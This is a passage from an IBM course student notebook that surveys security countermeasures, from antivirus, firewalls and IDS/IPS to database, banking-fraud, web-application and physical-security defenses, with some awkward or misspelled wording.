meet the needs of the modern computer network. When businesses started to widely embrace the Internet as
a sales channel and business tool in the early-to-mid 1990s, a new security model was required.
A closed-door approach doesn’t work when thousands or millions of people must be allowed to have access
to the services on an organization’s network. Likewise, an open-door approach doesn’t work when they need
to protect the privacy of each individual who interacts with the services on their network. E-commerce and
business required a more blended approach of providing limited access to data in a controlled fashion, which
is a more sophisticated and complex approach than that used by the earlier security models.
As the use of information technologies evolved, the original all-or-nothing approaches to security no longer
met the needs of information consumers. So, the practice of network security evolved. The concepts of
intranets and extranets were developed to accommodate internal and external customers, respectively, with
secured boundaries that resembled miniature versions of the firewall perimeter. Virtual private networks
(VPNs) were developed to provide a secure channel (or tunnel) from one network to another.
These approaches continued through the end of the 1990s to the early part of the 2000s, after which the first
edition of this book was published in late 2003. Throughout the first decade of the 21st century, the Internet
continued to become an increasingly critical business platform, and the network became more of a key
business component. As more companies started doing business on the Internet, concepts such as

Student Notebook
Software-as-a-Service (SaaS) were developed to provide business services over the Internet. And the threats
found on the Internet evolved as well. Basic viruses and worms along with the simple exploits and
man-in-the-middle attacks found in the decade of the 1990s became more sophisticated, effective, and
ubiquitous.
Today, business partners need to share information with an organization and often with each other as well.
Employees, consultants, contractors, service providers, system integrators and other entities that augment a
company’s resources all need to collaborate with a pool of information. Customers require secure access to
the information that they need. A secure data network allows an organization to distribute information quickly
and effectively throughout the organization, to business partners and to customers. Fig. 3 characterizes the
interconnectedness among data, computers, networks and information consumers.

V10.1
Student Notebook
Uempty

IBM Power Systems
Notes:
This figure illustrates the process of sharing of modern information among many consumers. This information
is shared via many channels. All the channels have also been illustrated in the diagram. This model uses
internet, SaaS, data network and cloud services for sharing data with the client as shown in the figure.

Student Notebook
Countermeasures (1 of 55) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Overview
– Countermeasures discuss the subject of securing data storage, how security can be applied to the
specific locations where data resides
• Definition
– A countermeasure is a process, system, device or action that can mitigate or prevent the effects of
various threats that an information asset like a computer, network or server faces
• Explanation
– It is important to categorize the information before applying countermeasures to it. Information is
typically categorized as being in either a structured format or an unstructured format
Figure 3-11. Countermeasures (1 of 55) DS011.0
Notes:
Countermeasures
This section discusses the subject of securing data storage, how security can be applied to the specific
locations where data resides. It also focuses on the static state of data (information) on a hard disk or in a
database, but in the high-bandwidth, mobile and networked environments in which employees work and live,
information rarely stays in one place. In a matter of microseconds, information can be distributed to many
locations and people around the world. In order to secure this data, countermeasures must be applied which
can secure the stored information.
A countermeasure is a process, system, device or action that can mitigate or prevent the effects of various
threats that an information asset like a computer, network or server faces.
It is important to categorize the information before applying countermeasures to it. Information is typically
categorized as being in either a structured format or an unstructured format. The meaning of these terms is
subject to different interpretations by divergent groups, so first it is important to address their meaning in the
context of the discussion of securing unstructured data. It also makes sense to think in terms of which of three
different states data is currently residing: at rest, in transit or in use. To learn about various countermeasures,
it will be more fruitful if the countermeasures are explained according to the different fields of security. The
section below discusses these countermeasures of data security in more detail.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Malware Countermeasures
– Anti-virus: The propagation of malicious code can be dealt with by using an antivirus software
– Firewall: A dedicated network appliance or a software program which serves the purpose of
separating an area which is secure from an area which is less secure. Following are the types of
firewall:
• Software Firewalls
• Hardware Firewalls
Notes:
Malware
A Malware is a specific set of codes or an application, specifically designed to harm and to gain access to a
targeted computer or spread across multiple computers, over the use of a network or a data storage device.
These malwares and the threat they possess have been discussed in Unit 1 and 2. Following are the
countermeasures which can be used against them.
Anti-virus: The propagation of malicious code can be dealt with by using an antivirus software. Trojan
horses, Viruses and worms are scanned for by the antivirus software installed in a system. There are
characteristics or fingerprints common in the family of viruses. These characteristics help in identifying and
neutralizing viruses before the viral spreads further. About 60,000 viruses, worms, logic bombs and various
other types of malicious code have been defined till date. However, the number keeps on increasing and new
ones come into play all the time. Keeping the definition database files current is usually the back breaking
task for antivirus manufacturer as these files contain every virus which is known and the associated
countermeasures which concerns a certain antivirus software. Organizations will always receive a new virus
that has not been repeated with any other organization. Therefore, if the virus database files in the software is
kept up-to-date, the vulnerability of an attack is reduced.
Firewall: A dedicated network appliance or a software program which serves the purpose of separating an
area which is secure from an area which is less secure. It also will control the communication amid them is a
security device called as a firewall

Student Notebook
The primary purpose of firewalls is to control incoming and outgoing communication which is ongoing in a
single machine or a network. The two main types of firewalls are as follows:
- Software Firewalls: They are also known as personal firewalls as they are designed in such a way
that a single system can be run by it. Home or small computing systems usually use these type of
firewall. The access which is unwanted is prevented by this type of firewall over a connection of
network. Firstly the unwanted access is identified and then it is prevented over the ports which are
risky. Different ports which have been recognized is used by the computing system to communicate.
The firewall permits these communications without even alerting the user about it.
- Hardware Firewalls: These firewalls are complex then the software firewall. They run on a network
appliance which has been engineered especially or they run on the servers which are optimized and
dedicated to the task to run the firewall. This type of firewall is very difficult to carry out an attack on
and has a basic operating system. Configuration on the system takes more steps then anticipated
and also no other software run on this machine making it very difficult to surpass. It may be kept
between a network and an area which is less secure

V10.1
Student Notebook
Uempty

IBM Power Systems
Notes:
This figure illustrates the working of a firewall. It can be noticed that the connection coming form the internet
is checked by the firewall and all viruses, worms etc. are filtered. After filtering the connection, a secured
connection of private network is sent forward to the systems situated in the organization. This secured
network is used by the different systems.

Student Notebook

IBM Power Systems
• Malware Countermeasures
– Anti-spyware: It is a type of software that is designed to detect and remove unwanted spyware
programs
– Educating end-users: Education is second method by which virus can be prevented
Notes:
Anti-spyware: It is a type of software that is designed to detect and remove unwanted spyware programs.
Spyware is a type of malware that is installed on a computer without the user's knowledge in order to collect
information about them. This can pose a security risk to the user, but more frequently spyware degrades
system performance by taking up processing power, installing additional software, or redirecting users'
browser activity.
Anti-spyware software detects spyware through rules-based methods or based on downloaded definition files
that identify common spyware programs. Anti-spyware software can be used to find and remove spyware that
has already been installed on the user's computer, or it can act much like an anti-virus program by providing
real-time protection and preventing spyware from being downloaded in the first place.
Educating end-users: Education is second method by which virus can be prevented. It should be
recommended that the users must only open the files which they think is reasonable that there will be no
trace of any virus on the file. Every email, every disk must be scanned that they receive and it must be made
sure that the document doesn’t have any virus in it. An organization should also verify that security settings
are high within the applications their users are using.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Network Security Countermeasures

– Network Monitors: The introduction of network monitors was due to the need of troubleshooting
network problems.
– Intrusion Detection Systems (IDS): A system can be configured by a network administrator in such
a way that it works like a burglar alarm
Notes:
Network Security
It is important to monitor the network and make sure the traffic on it belongs there. This section discusses the
various countermeasures which if applied can help to stop the breach of the data which is present on the
network.
Network Monitors: The introduction of network monitors was due to the need of troubleshooting network
problems. When there was a need to examine the signaling and traffic, network configuration programs like
IPCONFIG weren’t proving to be helpful as they didn’t get down on the wire and tell the physical happenings
on a network. Hence, a network monitor was required and with time, they have got cheaper, smaller, and
simpler. They are used easily and effectively and agree with most of the environments.
A system which will monitor a network consists of a computing system with a NIC which runs in an immoral
mode and also a software which monitor the network. This monitoring software is driven by a menu and has a
big help file which makes it easier to use. Sniffers display traffic which has a possibility of becoming overly
involved and may also require additional technical materials.
Intrusion Detection Systems (IDS): A system can be configured by a network administrator in such a way
that it works like a burglar alarm. This can be achieved by using an intrusion detection system (IDS).
Individual workstations or network devices provide the necessary platform for an IDS software for tracking
and monitoring network activity, evaluating system logs, disconnecting sessions and identifying suspicious
activity that violate any security settings.

Student Notebook
The configuration of IDS can be changed by the network administrator according to the required action.
These tools demand maintenance and planning so as to carry out an effective work. IDSs are being sold with
firewalls by vendors. IDS work hand-in-hand with firewalls as firewalls, though capable of preventing many
common attacks, lack the intelligence required to monitor the whole network. But the working together feature
of IDS and firewall brings forth the preventing and reacting roles of IDS and firewall respectively
Educating end-users: Education is second method by which virus can be prevented. It should be
recommended that the users must only open the files which they think is reasonable that there will be no
trace of any virus on the file. Every email, every disk must be scanned that they receive and it must be made
sure that the document doesn’t have any virus in it. An organization should also verify that security settings
are high within the applications their users are using.

V10.1
Student Notebook
Uempty

IBM Power Systems
Notes:
This diagram illustrates the working of a firewall and IDS. When Intrusion Detection System (IDS) is
combined with a firewall and the combination is employed then the connection becomes more secure as the
firewall filters the malicious content in the connection and then IDS detects the different elements which can
compromise the system and intrude it.

Student Notebook

IBM Power Systems

– Honeypot: A computing system which has been turned into a target by an attacker for other attacks
• The main purpose of a honeypot is to make a computing system a target which can be identified
and can be targeted accordingly in order to carry out the computing attacks.
– Intrusion Prevention System (IPS): An Intrusion Prevention System (IPS) is a network

security/threat prevention technology that examines network traffic flows
• Vulnerability exploits usually come in the form of malicious inputs to a target application or service
that attackers use to interrupt and gain control of an application or machine
Notes:
Honeypot: A computing system which has been turned into a target by an attacker for other attacks which is
associated with the computers is known as honeypot. The main purpose of a honeypot is to make a
computing system a target which can be identified and can be targeted accordingly in order to carry out the
computing attacks.
It acts as a ruse to lure an attack and while the system is being attacked, the time is utilized to study the key
features of the attack regarding how the attack was developed and by using this intelligence,
countermeasures can be developed in case of further attacks. Honeypot system also has the added benefit of
protecting high value systems by keeping attackers away.
Intrusion Prevention System (IPS): An Intrusion Prevention System (IPS) is a network security/threat
prevention technology that examines network traffic flows to detect and prevent vulnerability exploits.
Vulnerability exploits usually come in the form of malicious inputs to a target application or service that
attackers use to interrupt and gain control of an application or machine.
Following a successful exploit, the attacker can disable the target application (resulting in a denial-of-service
state), or can potentially access to all the rights and permissions available to the compromised application.
The IPS often sits directly behind the firewall and is provides a complementary layer of analysis that
negatively selects for dangerous content. Unlike its predecessor the Intrusion Detection System (IDS) which
is a passive system that scans traffic and reports back on threats the IPS is placed inline (in the direct

V10.1
Student Notebook
Uempty communication path between source and destination), actively analyzing and taking automated actions on all
traffic flows that enter the network. Specifically, these actions include:
- Sending an alarm to the administrator (as would be seen in an IDS)
- Dropping the malicious packets
- Blocking traffic from the source address
- Resetting the connection
As an inline security component, the IPS must work efficiently to avoid degrading network performance. It
must also work fast because exploits can happen in near real-time. The IPS must also detect and respond
accurately, so as to eliminate threats and false positives (legitimate packets misread as threats).

Student Notebook

IBM Power Systems
• Network Security Countermeasures (Contd.)

– Demilitarized Zone (DMZ): Local area networks (LAN) can be secured by using a firewall
configuration viz. DMZ
• DMZ also allows one or more computers to run outside the firewall
– Security Logs/Access Logs: The Security Logs can be accessed in the Event Viewer underneath
the Windows Logo
• The Maximum Log Size entry, for the log, is recommended to be as large as per the affordability of
the organization and select Do Not Overwrite Events
Notes:
Demilitarized Zone (DMZ): Local area networks (LAN) can be secured by using a firewall configuration viz.
DMZ. IN DMZ, a public network (such as the Internet) has a connected firewall behind which computers on
the LAN are running. DMZ also allows one or more computers to run outside the firewall. These computers
add an extra protective layer, for the systems behind the firewall, by brokering requests and intercepting
traffic. Thus, when the systems inside the firewall initiate any request (allowed in traditional DMZs) which is
outbound to the DMZ, the DMZ systems respond by forwarding the request to the public network (Internet). It
is common for DMZs to utilize a proxy server similar to the systems in the DMZ. The computers in the DMZ
are forbidden, from initiating inbound requests, by the LAN firewall. A true DMZ computer has the feature of
acting as an intermediate entity between the incoming requests and the firewall. However, in broadband
routers, a DMZ is implemented through additional rules of firewall, making the requests reach the firewall
directly. DMZ is just an overly advertised feature in home broadband routers. Thus, this is essentially not a
true DMZ.
Security Logs/Access Logs: The Security Logs can be accessed in the Event Viewer underneath the
Windows Logo. A lock (audit failure) or a key (audit success) generally precede each event. The Maximum
Log Size entry, for the log, is recommended to be as large as per the affordability of the organization and
select Do Not Overwrite Events. It is recommended for an organization to audit the log entries weekly and
each of those times it should be checked if there are any alarms requiring the organization’s response. If not,
the file can be cleared manually. Access Log, in windows, keeps the record of each log-in/log-out making it
essentially similar to Security log.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Audit Logs: There should be regular examination of the log files that are created by network services
which are crucial in nature. Following are the filters to be deployed:
• Reporting
• Alarms
• Alerts
• Trends
Notes:
Audit Logs: There should be regular examination of the log files that are created by network services which
are crucial in nature such as the examination of DNS should be done routinely. The DNS service writes
entries to the log file, when it runs on Windows Server 2008, event viewer can be used to examine this. An
organization should take same actions for the logs of DNS Server as it does for setting the size and overwrite
the log object for the security. Often log files are created by a firewall, whether hardware or software, the
same way as most of the other services do when they are being enabled.
Since the fire wall and its purpose are of utmost importance, the firewall generated logs should be evaluated
on a regular basis and should be held in high regards. If the firewall is running, the organization can create
the log files anywhere. The place where logs are generated can vary from an appliance to a workstation. The
logs are also created by most of the antivirus programs when they run.
Those files should also be regularly checked by a log manager. As He/she will want that not only the
programs but the definition files are also verified. Various filters deployed on the logs are targeted towards the
following activities:
- Reporting: The reports which are being generated is the one item that is omnipresent in every place
of work. The reports generated by every department are used as dashboard for action they want to
take. The departments of security and IT are no different. To analyze or share reports of the security
information with others, an organization mainly needs to focus on three key areas: alarms, alerts, and
trends. We will now discuss these in detail

Student Notebook
- Alarms: Alarms are indications of a problem currently going on; think of a siren sounding when
someone kicks in the door to a home
- These are conditions that an organization must respond to right now. Alarm rates can indicate trends
that are occurring, and after an organization solves the problem, they need to look for indications that
the condition may not be isolated
- Alerts: Slightly below alarms are alerts; these are issues that an organization needs to pay attention
to but are not bringing the system to its knees at this very moment (think of them as tornado watches
instead of tornado warnings). In Event Viewer, for example, system events are identified as errors,
information, or warnings. While errors are the most critical, the others need attention as well to keep
them from eventually becoming errors
- Trends: Trends indicate where problems are occurring. By focusing on trends, an organization can
identify weaknesses in their system and areas where they need to devote more resources to head off
future problems

V10.1
Student Notebook
Uempty

IBM Power Systems
• Cryptography Countermeasures
– Defense against key management attacks: Cryptography offers algorithms which are well accepted
and widely used for confidentiality, authentication and integrity
• The relying basic feature for a cryptographic systems is the efficient, secure and robust key
management system
• The input information in a cryptographic algorithms is called the key
• If the identity of key is compromised, the information is lost
• Local hosts use Key Encryption Key (KEK) method for building a line of defense
• The Diffie-Hellman (DH) scheme allows a session key to be generated at both ends when some
public information is being exchanged between two communication parties
Notes:
Defense against key management attacks: Cryptography offers algorithms which are well accepted and
widely used for confidentiality, authentication and integrity. The relying basic feature for a cryptographic
systems is the efficient, secure and robust key management system which serves as essential and key part of
any secure communication but proves to be a liability in case of protocol design and system security. The
input information in a cryptographic algorithms is called the key.
The key holds the way to get the encrypted information. If the identity of key is compromised, the information
is lost. Thus, it is important to ensure the secrecy of symmetric key and the private key. Local hosts use Key
Encryption Key (KEK) method for building a line of defense. However, potential attacks are always a threat
and a high risk is presented in an insecure channel for key agreement and key distribution. A public-key
algorithm is used to encrypt a session key generated on the sender side.
This is essentially the traditional digital envelope approach. After encryption, the key is delivered on the other
side. The Diffie-Hellman (DH) scheme allows a session key to be generated at both ends when some public
information is being exchanged between two communication parties. The middle-man attacks have pushed
forth the need to develop several enhanced DH schemes.
The symmetric approach prevents a reply attack on setting up a session key by including the sequence
number or a nonce. Needham-Schroeder, a multi-way threat response protocol is also used and has further
aided in developing other authentication protocols, like Kerberos (variant of Needham-Schroeder), which are
used in Windows and many other real time systems.

Student Notebook
Advances key attacks are a threat to key integrity and ownership. Data authentication and integrity can be
ensured by using Hashed Message Authentication Code (HMAC), message digest, and digital signature. In
public-key certificate, the public key is secured by binding it with owner’s identity. This is done by the
Certification Authority (CA) in PKI.
The vouching for the public-key certificate is done by peer nodes in a distributed manner, in case the systems
do not have a trusted third party (TTP). Pretty Good Privacy (PGP) is an example of a peer node. Threshold
cryptography, is established in some distributed approaches, in which a subset or all the network hosts are
provided with the system secret. The ownership of a key can be proved using a certificate but it cannot prove
whether an entity is “good” or “bad”.
The main purpose it serves is key authentication. After a certain period of usage, the key security is
compromised and it is viable to be disclosed after which it cannot serve any purpose and is no longer useable
and some 28 mechanisms are required to enforce the disclosure. PKI gives the option to do this in an implicit
or explicit manner. In case the Case Certification Authority (CA) needs to revoke a certificate explicitly and
inform the network by including it in the certificate revocation list (CRL) to prevent its usage, the private key
cannot be disclosed during the valid period.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Database Security Countermeasures

– Preventing Database Communication Protocol Attacks: Protocol validation is a technology that
helps in defeating data communication protocol attacks
• Blocking actions or alerts are generated in case the live traffic do not match the expectations
– Preventing Backup Data Exposure: Encryption of data backups is also necessary and it is been
suggested by vendors
• Cryptographic key management and performance point out as drawbacks and a poor substitute to
other aforementioned privilege controls
Notes:
Database Security
Preventing Database Communication Protocol Attacks: Protocol validation is a technology that helps in
defeating data communication protocol attacks. This technology clears out the database traffic, and
compares it with the expected results. Blocking actions or alerts are generated in case the live traffic do not
match the expectations. The task of protecting and auditing against protocol threat is accomplished by
comparison between live communication protocols and protocol structures.
This task is regulated by Database Communication Protocol Validation and is the only one to provide this
capability. Derived through the ongoing research of Imperva Application Defense Center (ADC), it is
implemented to address database communication protocols and vulnerabilities. Application and database
vendors like Microsoft and Oracle have given the credit to ADC for discovering mitigation techniques for
various serious vulnerabilities that has led them to achieve a substantially higher level of product security.
Preventing Backup Data Exposure: Encryption of data backups is also necessary and it is been suggested
by vendors that DBMS products may not align with creating backups that are not encrypted. Cryptographic
key management and performance point out as drawbacks and a poor substitute to other aforementioned
privilege controls, when the popular suggestion of encryption of online products is made.

Student Notebook

IBM Power Systems

– Preventing Authentication Attacks
• Strong Authentication
• Directory Integration
• Authentication Protections
• High Performance
• Separation of Duties
• Cross-Platform Auditing
Notes:
Preventing Authentication Attacks:
Strong Authentication: There must be a process that implements the strongest technologies of
authentications which are practically possible. An authentication which involves two factors is considered to
be good authentication process. However they are quite impractical as they are very costly and are very
difficult to use. Strong passwords or username policy must also be in place which will serve as a strong wat=y
to authenticate a user
Directory Integration: Infrastructure of the directory of the enterprise must be used along with strong
mechanism of authentication in order to get the authentication mechanism easy to use and scalable.
Directory infrastructure enables the user such that they can use their credentials used to log in. in this way,
the use of the authentication technology is made easy.
Authentication Protections: Breakdowns happen in spite of all the effort which is put in to have a strong
process of authentication. There are many reasons why this happens, following are some of them:
- The policies that are put to make the password stronger are ignored
- An attacker may get lucky and launch a brute force attack
- A scheme of authentication may be required for reasons of practical manner
Many online and offline applications are available that overcomes all the above mentioned difficulties and
prevents the attacks which are associated with authentication

V10.1
Student Notebook
Uempty High Performance: The appliances which are based on networks can be operated at line speed with no
impact on the performance of database. These appliances are made for audit purposes. If the processes of
audit are offloaded to these network appliances then it can be expected that the performance of the database
of the organization will improve.
Separation of Duties: The appliances that help in audit and are based on the network can be operated without
any connection to one another which makes it easy for the administers of the database to separate duties
appropriately. These devices are also not vulnerable to the attacks associated to privilege elevation as they
work independently from the server
Cross-Platform Auditing: Centralized operations of audits and uniform standards are enabled by network
based appliances which help in audit. The server costs of the database, requirements of balancing the load
and other costs associated to administrator are reduced by these two factors alone

Student Notebook

IBM Power Systems

– Preventing Platform Attacks: The necessary protection can be achieved by an amalgamation of
Intrusion Prevention Systems (IPS) and regular software updates (patches)
• The vulnerabilities present in the database can be eliminated using the vendor-provided updates
• IPS addresses these problems, identifies attacks, as well as inspects traffic as mentioned before
Notes:
Preventing Platform Attacks: Database assets are often threatened with platform attacks. The necessary
protection can be achieved by an amalgamation of Intrusion Prevention Systems (IPS) and regular software
updates (patches). The vulnerabilities present in the database can be eliminated using the vendor-provided
updates. However, the system remains vulnerable between the periodic cycles according to which the
enterprises provide and implement updates. Compatibility problems further add to the vulnerability issues.
IPS addresses these problems, identifies attacks, as well as inspects traffic as mentioned before.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Preventing Excessive Privilege Abuse: The privileges associated with the databases should only
be limited to the SQL’s level at a minimum amount
– Access Control
– Flow Control
– Encryption
– RAID
– Authentication
Notes:
Preventing Excessive Privilege Abuse: The privileges associated with the databases should only be
limited to the SQL’s level at a minimum amount, thus acting as a helping mechanism in case of excessive
privileges. The extent of access control reaches often external of the exact rows and columns. Thus, if
contact information is updated by an administrator of the university, the access control mechanism would
allow it. However, if he attempts to alter his grades, an alert is issued by the access control mechanism.
When detecting of excessive privilege abuse by malicious employees, query-level access control shows its
significance. Also most of the top ten threats (described here) can be prevented using query-level access
control. A certain level of access control is allowed in most database software implementation, which are
question-based is implemented but, except for the most limited deployments, they are rendered impractical.
The time consuming process of granting query level access is defined and updating policies to reflect new
roles every time user roles change (bound to change over time) add to the woes. Since it is a back breaking
process for the database administrators to define query policies for hundreds of users at a time, there is a
generic set of excessive access privileges provided by most organizations to users. Real query-level access
control are made possible with necessary help of automated tools. Below are the steps taken in the
prevention of excessive privilege abuse:

Student Notebook
Access Control: A database for an organization contains a great deal of information and usually has several
users. Most of them need to access only a small part of the database. A policy defines the requirements that
are to be implemented within hardware and software and those that are external to the system, including
physical, personal, and procedural controls.
Flow Control: Flow control provides the flow of information among accessible objects. Flow controls check
that information contained in objects does not flow explicitly or implicitly into less protected objects.
Encryption: An encryption algorithm should be applied to the data, using a user-specified encryption key. The
output of the algorithm is the encrypted version. There is also a decryption algorithm, which takes the
encrypted data and a decryption key as input and then returns the original data.
RAID: Redundant Array of Independent Disks which protect against data loss due to disk failure.
Authentication: Access to the database is a matter of authentication. It provides the guidelines how the
database is accessed. Every access should be monitored.
Backup: At every instant, backup should be done. In case of any disaster, Organizations can retrieve their
data

V10.1
Student Notebook
Uempty

IBM Power Systems
• Banking Frauds Countermeasures

– Universal Payment Identification Code (UPIC)
– ACH Block (Automated Clearing House)
– Fraud Detection Software/tools
Notes:
Banking Frauds
Universal Payment Identification Code (UPIC): Electronic Payment Network (EPN) has developed a
unique account identifier issued by a financial institution. This unique account identifier, known as UPIC,
allows merchants to do e-business and receive e-payment while ensuring that the confidential banking
information is secure and undisclosed.
ACH Block (Automated Clearing House): If the merchant account is unauthorized for ACH transaction,
ACH Block prevents ACH activity and the merchant can receive alert from the bank to ACH transactions that
don’t meet predefined conditions and then take decision whether to accept or decline the transaction. This
enables the merchant to stop e-fraud before it happens.
Fraud Detection Software/tools: Detection of frauds and reduction in fraud rates for an organization
involved in e-business is done by installing fraud detection tools. The results of the software help the
merchant to decide whether to accept, reject or review ongoing transaction. The grouping of the categories of
fraud detection tools is done into proprietary data, multi-merchant data, purchase device tracing and
validation service. Risk Management Modules or Fraud Screens, Card Verification Code (CVC) and Address
Verification Service (AVS) are some tools that are used by 56% of the merchants, as according to
CyberSource (2012).

Student Notebook

IBM Power Systems
• Banking Frauds Countermeasures (Contd.)

– IP Address Locator
– Credit Card Number Hacking Attack Countermeasures
– Skimming Attack Countermeasures
Notes:
IP Address Locator: The exact location of the user and origin on a map, telling approximately the city and
the state, can be known to the merchant using IP address locator. Additionally, it also tells the distance
between the actual location of the person entering the order and the billing address of online buyer.
When there is a great difference in the distance, and since this is not a proof of the visitor using a proxy, the
merchants can apply authentication measures for transaction and allow, reject or review the transaction
accordingly. Users using anonymous proxy servers in order to hide their IP address (by obtaining a list of
anonymous proxy server), should under check.
Credit Card Number Hacking Attack Countermeasures: Using temporary numbers when shopping proves
to be an effective way to save your credit card number from being compromised when being stored by a
merchant. ShopSafe is a program by MBNA allowing the customers a secure website and providing them
with the liberty of generating a new card number with a specific credit limit and expiration date for each
purchase.
Thus, if they want to spend $150, a unique credit card number is created with a credit limit of $150. Since
after the initial stage, i.e. providing the number to the merchant and charging the card, the number is no
longer valid, it does not matter if the number is stored by the merchant or compromised in the future.
Citibank’s Virtual Account Numbers Program and Discover’s Deskshop Virtual Credit Card are some of the
credit card companies offering similar services.

V10.1
Student Notebook
Uempty Skimming Attack Countermeasures: When paying in restaurants, credit cards should not be simply handed
to waiters. An eye should be kept on the card by the user when the card is handed over to make payments.
Best way is to locate credit card machines nearby so that the user can see what’s being done with the card.
Skimmer devices being very small (size of a pager) can be easily concealed and fool the credit card user.
Skimmer only needs to swipe the card for a few seconds. ATMs of well-known banks should be used at
places like restaurants, gas stations, convenience stores, etc.

Student Notebook

IBM Power Systems
• Web Application Countermeasures

– Cross site script forgery Countermeasures: Countermeasures for stopping cross-site forgery are
given below:
• Check and validate all files
• Need of security policy
• Need of security review
• Implementation and use of different tools
• Filtration of the output script
• Comparison of the generated code
Notes:
Cross site script forgery Countermeasures: Countermeasures for stopping cross-site forgery are given
below:
- All hidden fields, cookies, parameters, query strings and form fields must be checked and validated
against a specification which has been fixed by the authorizing body
- A security policy which is stringent must be implemented
- A security review must be performed of the code and all places must be searched where there is a
possibility of input generation from the request of HTTP
- Tools like Niktro, Nessues etc. should be employed to scan the websites of the organization which
can help to find some vulnerabilities
- In order to defeat XSS vulnerabilities, the output of the script must be filtered. It will help in preventing
the vulnerabilities to transmit to the machines of the users
- The generated code must be compared against the specifications which have been set by the higher
authority
- A security policy which is stringent, positive and practical must be in place which will allow the
specifies to be allowed and the vulnerabilities to be blocked
- Input fields should have a reasonable maximum amount of allowed characters. Most script attacks
need many characters to operate

V10.1
Student Notebook
Uempty

IBM Power Systems

– SQL Injection Countermeasures
– Command Injection Flaws Countermeasures
– Directory Traversal/Forceful Browsing Countermeasure
Notes:
SQL Injection Countermeasures: Unchecked user input to database queries should not be allowed to pass.
Every user variable passed to the database should be validated and sanitized. The given input should be
checked for any expected data type. User input, which is passed to the database, should be quoted.
Command Injection Flaws Countermeasures: To avoid the command injection is the best way to protect
the systems against it. Identical functions are performed by libraries which are language specific for many
system calls and shell commands. Most shell command problems are avoided by these libraries. This can be
carried out by them as the interpreter of the shell of the operating system in not contained by them. The data
must be validated very carefully in order to ensure that requests can be arranged in a pattern.
Directory Traversal/Forceful Browsing Countermeasure: Web applications can leak information, and the
Web administrator’s objective should be to prevent any such disclosures. Information leakage can be stopped
at the server level through strong configurations. Most of these attacks are against embedded Web servers,
included as part of other products, rather than real Web servers such as Apache and IIS. Hotfixes and
patches should be applied to fix vulnerabilities that affect directory traversal. There should also be
least-privilege access policies. This ensures that only the Web administrator has the ability to alter any
information in the Web applications. The programmers of the application should design the site in such a
manner that only desired information is disclosed to the public. Error messages should not disclose the
directory structure. Separate Web documents must be implemented for user and administrator interfaces. In
the case of a site requiring authentication, it should be ensured that authentication is applied to the entire
directory and its sub-directories. Users should be prevented from accessing ASP and XML files.

Student Notebook

IBM Power Systems

– Cryptographic Interception Countermeasures
– Authentication Hijacking Countermeasures
– Log Tampering Countermeasures
Notes:
Cryptographic Interception Countermeasures: Interception can be countered with Secure Socket Layer
(SSL) and advanced private-key protection. These ensure that the data traversing between the client and the
server cannot be read in clear text, if intercepted.
Authentication Hijacking Countermeasures: To protect against authentication hijacking, authentication
should occur over secure channels with strong authentication capabilities. There should be a comprehensive
definition of allowed methods and actions to take upon successful or unsuccessful presentation of
credentials. Instant SSL can easily be configured to encrypt traffic between the client and the application,
including authentication credentials. Cookies can be configured to force the use of strong authentication.
Log Tampering Countermeasures: To protect the integrity of logs, all logs must be digitally signed and
time-stamped, creating a tamper-proof audit trail of legitimate business transactions versus attacker activity.
Separate logs for system events, network firewall events, and application events should be generated.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Error Message Interception Countermeasures
– Attack Obfuscation Countermeasures
– Security Management Exploits Countermeasures
Notes:
Error Message Interception Countermeasures: Error message should be generic without being rich in
information. Attackers can misuse the information reflected in error messages. Website cloaking capabilities
make enterprise Web resources invisible to attackers and worms scanning for vulnerabilities, significantly
reducing the likelihood of exploits due to such vulnerabilities.
Attack Obfuscation Countermeasures: There should be in-depth inspection of all traffics. It should be set
to allow, block, or translate Unicode and UTF-8 encoding to display possible attacks. The system that
performs the decoding must allow for advanced decoding and have the performance to inspect every TCP
stream for signs of attack.
Security Management Exploits Countermeasures: All management functions should be firewalled and
operated through dedicated management channels. Since all Web applications are unique, each may require
a different set of security policies. For instance, a business-to-business extranet application may require
application attack prevention, encryption, authentication, and detailed transaction logging, while an HR portal
may only require encryption and moderate logging. There is also no practical limit to the number of security
zones that can be managed from a single gateway.

Student Notebook

IBM Power Systems

– Web Services Attacks Countermeasures
– DMZ Protocol Attack Countermeasures
• Intrusion Prevention System (IPS)
• Security policy
• Auditing process
• Updated controls and procedures
Notes:
Web Services Attacks Countermeasures: There should be provision for multiple layers of protection that
dynamically enforce legitimate applications usage and block all known attack path with or without relying on
signature database. This combination has proven effective in blocking even unknown attacks. Standard
HTTP authentication techniques such a digest and SSL client-side certificates can be used for Web services
as well. Since most models incorporate business-to-business applications, it can be easier to restrict access
to only valid users.
DMZ Protocol Attack Countermeasures: To protect against well-known exploits, suitable patches should be
applied, if they are available. The use of signatures to detect and block well-known attack can be somewhat
effective, but the signatures must be available for all forms of attack and must be continually updated. These
steps should be followed:
- Use an Intrusion Prevention System (IPS)
- Deploy a robust security policy
- Have a sound auditing policy
- Use signature to detect and block well-known attacks
- Keep those signatures up to date

V10.1
Student Notebook
Uempty

IBM Power Systems
• Physical Security Countermeasures

– Physical Barrier: An organization should make sure to have at least three physical barriers for an
effective access control mechanism:
• Perimeter
• A locked door
• Computer room entrance
Notes:
Physical Barrier: Physical barrier is a key aspect in access control as it prevents access to computer and
network systems. An effective physical barrier mechanism should employ multiple physical restrictions that
need to be crossed to access the protected systems. This multiple barrier system approach ensures that
unnecessary and harmful elements are kept out. An organization should make sure to have atleast three
physical barriers for an effective access control mechanism:
- Perimeter i.e. the external entrance to the building should be equipped with burglar alarms, protected
by external walls and fencing, and has surveillance installed, etc. Additionally, an access list must be
present for identifying who has access to building and can be verified by someone in authority using
the access list.
- A locked door protecting the computer centre and to keys, ID batches, smart cards, etc. to be used to
access the computer centre.
- Computer room entrance. This should be another locked door that is carefully monitored. While an
organization try to keep as many intruders out with the other two barriers, many who enter the
building could be posing as someone they are not—heating technicians, representatives of the
landlord, and so on. Although these pretenses can get them past the first two barriers, they should
still be stopped by the locked computer room door

Student Notebook

IBM Power Systems
Notes:
This diagram illustrates the working of a 3 layer security process.

V10.1
Student Notebook
Uempty

IBM Power Systems

– Mantrap: Mantrap are high-security installations that use intermediate access control mechanism
• it only allows only a limited number (one or two) of people to enter into the facility
• It also serves to physically hold in an unauthorized person
Notes:
